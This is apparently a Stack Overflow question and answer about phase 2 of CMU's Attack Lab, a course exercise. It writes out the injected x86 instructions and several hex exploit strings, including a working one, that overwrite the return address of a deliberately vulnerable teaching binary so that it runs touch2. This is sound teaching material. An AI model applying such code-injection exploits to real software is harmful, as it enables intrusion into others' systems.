# The Attack Lab phase 2 (Buffer Oveflow Attack)

Tags: assembly, x86, segmentation-fault, memory-address, buffer-overflow

I have a buffer overflow lab I have to do for a project called [The Attack Lab](http://csapp.cs.cmu.edu/3e/attacklab.pdf). I'm on phase 2 of the lab, and I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2(). I've gotten the correct exploit code I need (confirmed with TA):

```
movq $0x4ed659a2,$rdi
pushq $0x4018c3  //address of touch2
ret
```

I compiled and disassemble this code:

`Disassembly of section .text:`

```
   0:   48 c7 c7 a2 59 d6 4e    mov    $0x4ed659a2,%rdi
   7:   68 c3 18 40 00          pushq  $0x4018c3
   c:   c3                      retq
```

I want to find the correct exploit string to pass into the program? The address of `%rsp` is `0x5560a188`.

My TA said the comment of [this discussion](https://stackoverflow.com/questions/53255874/buffer-overflow-attack-the-attack-lab-phase-2) is correct so I tried this exploit string

```
48 c7 c7 a2 59 d6 4e 00
68 c3 18 40 00 00 00 00
c3 00 00 00 00 00 00 00
88 a1 60 55 00 00 00 00
```

but this is incorrect. It did not even reach `touch2`.

Before that, I worked on the solution like this:

```
48 c7 c7 a2 59 d6 4e c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
88 a1 60 55 00 00 00 00
c3 18 40 00 00 00 00 00
```

for

```
0:   48 c7 c7 a2 59 d6 4e    mov    $0x4ed659a2,%rdi
7:   c3                      retq
```

and got a segfault.

I disassembled rtarget [here](https://pastebin.com/cVVkG4JR). ctarget and rtarget behave the same.

Thanks.

Comment: are you running the exploit string through `hex2raw`?

Comment: Yes I am! I tried ```48 c7 c7 a2 59 d6 4e 00 | 
68 c3 18 40 00 00 00 00 |
c3 00 00 00 00 00 00 00 |
88 a1 60 55 00 00 00 00``` but it doesn't work.

Comment: I generate that exploit string to `exploit.txt` and use the command exactly like you but I failed. It even did not reach `touch2`. So I think the way I generate it is wrong and come here for help T_T

Comment: I'm not sure we can help unless you show us the output of `objdump -d ctarget` so we can see the assembly code of the vulnerable program.

Comment: I did :< it did not even reach `touch2`.

Comment: Can you add to your question the output of `objdump -d ctarget` ? Because if you are passing the string properly then the reason for the failure is because your exploit is incorrect. We can't help you unless we know what the code in `ctarget` does (we'd be able to determine the stack layout based on the vulnerable code).

Comment: the file is very long. Which function do you want to look at? touch2 and getbuf?

Comment: Post the entire thing in https://pastebin.com even if it is long. I won't know what I'll need unless I see the whole thing.

Comment: I added it in the bottom of the question!

Comment: If I get a chance I will look at it later this evening and other SO users who may be curious can look at it as well.

Comment: I got help from my professor and passed this phase! I posted an answer below if you're curious! Btw thank you so much for your help.

Answer (score 1):

I have asked my professor and got the solution.

Initially, my incorrect exploit string was

```
48 c7 c7 a2 59 d6 4e 00
68 c3 18 40 00 00 00 00
c3 00 00 00 00 00 00 00
88 a1 60 55 00 00 00 00
```

However, my prof told me NOT to add any extra bytes between the instructions. So I tried

```
48 c7 c7 a2 59 d6 4e 
68 c3 18 40 00
c3
00 00 00 00 00 00 00 00 00 00 00
88 a1 60 55 00 00 00 00
```

and it works!

Thus, we just need to make sure that all bytes of the instructions are together with no padding between, and don't mess up the order of instruction in term of bytes!

Comment: Yeah, x86 machine code instructions are variable length. https://wiki.osdev.org/X86-64_Instruction_Encoding  A `00` byte inserted after an instruction, before the next instruction, will decode as the opcode for `addb %reg, %reg/mem` (https://www.felixcloutier.com/x86/add).  `00 00` is `addb %al, (%rax)`, with the ModRM byte also being 0. You can see what happened if you run the exploit under GDB and single-step the program under attack to see it execute your mangled payload.  So yeah, that's why padding has to go *after* the instructions, not between!